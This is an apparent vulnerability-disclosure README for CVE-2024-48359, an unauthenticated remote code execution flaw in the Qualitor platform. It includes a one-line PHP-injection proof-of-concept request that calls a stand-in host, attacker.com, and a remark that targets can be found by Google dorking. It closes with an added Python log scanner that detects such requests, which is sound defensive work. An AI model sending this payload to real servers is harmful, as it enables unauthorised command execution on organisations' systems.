OpenXP-Research/CVE-2024-48359

CVE-2024-48359 - Qualitor <= v8.24 Unauthenticated RCE PoC

CVE-2024-48359 | Qualitor <= v8.24 RCE

Description

Qualitor is a business process management platform used by various companies in Brazil; instances can be identified simply by using Google dorking.

Our team identified a Remote Code Execution (RCE) vulnerability in the application, which allows remote execution of system commands.

This is a bypass of the CVE-2023-47253 fix.

Proof of Concept (POC)

Just send PHP code to the page processVariavel.php in the gridValoresPopHidden parameter, e.g.: /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=nl2br(stream_get_contents(popen('ping attacker.com', 'r')));
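A defender-side check for the request shape shown above, added here as an example and not part of the original repository: it scans web access logs for requests to processVariavel.php whose gridValoresPopHidden value contains a PHP-style function call. The combined log format, the function names, the sample log lines and the heuristic that a legitimate value never contains a call are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script path and parameter taken from the PoC request above.
TARGET_SCRIPT = "/adpesquisasql/request/processvariavel.php"
TARGET_PARAM = "gridValoresPopHidden"

# Assumption: a legitimate value never contains a PHP-style call, name(...).
CALL_RE = re.compile(r"([A-Za-z_][A-Za-z0-9_]*)\s*\(")
# Request target inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IPs, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2025:10:00:00 +0000] "GET /html/ad/adpesquisasql/'
    'request/processVariavel.php?gridValoresPopHidden=nl2br(stream_get_contents'
    '(popen(%27ping%20attacker.com%27,%20%27r%27))); HTTP/1.1" 200 512',
    '203.0.113.8 - - [01/Jan/2025:10:01:00 +0000] "GET /html/ad/adpesquisasql/'
    'request/processVariavel.php?gridValoresPopHidden=12,15 HTTP/1.1" 200 87',
    '203.0.113.9 - - [01/Jan/2025:10:02:00 +0000] "GET /index.php?q=f(x) '
    'HTTP/1.1" 200 1024',
]


def suspicious_calls(log_line):
    """Return function names found in gridValoresPopHidden, else []."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    # Case-insensitive path match, since some web servers ignore path case.
    if not url.path.lower().endswith(TARGET_SCRIPT):
        return []
    # parse_qs percent-decodes, so %28/%29-encoded parentheses are caught too.
    params = parse_qs(url.query, keep_blank_values=True)
    return [name for value in params.get(TARGET_PARAM, [])
            for name in CALL_RE.findall(value)]


def scan(lines):
    """Yield (client_ip, function_names) for every flagged request."""
    for line in lines:
        calls = suspicious_calls(line)
        if calls:
            yield line.split(" ", 1)[0], calls


if __name__ == "__main__":
    for ip, calls in scan(SAMPLE_LOG):
        print(f"ALERT {ip}: PHP call(s) in {TARGET_PARAM}: {', '.join(calls)}")
```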


Researchers

https://www.linkedin.com/in/xvinicius/

https://www.linkedin.com/in/hairrison-wenning-4631a4124/

  • OpenXP Research Team
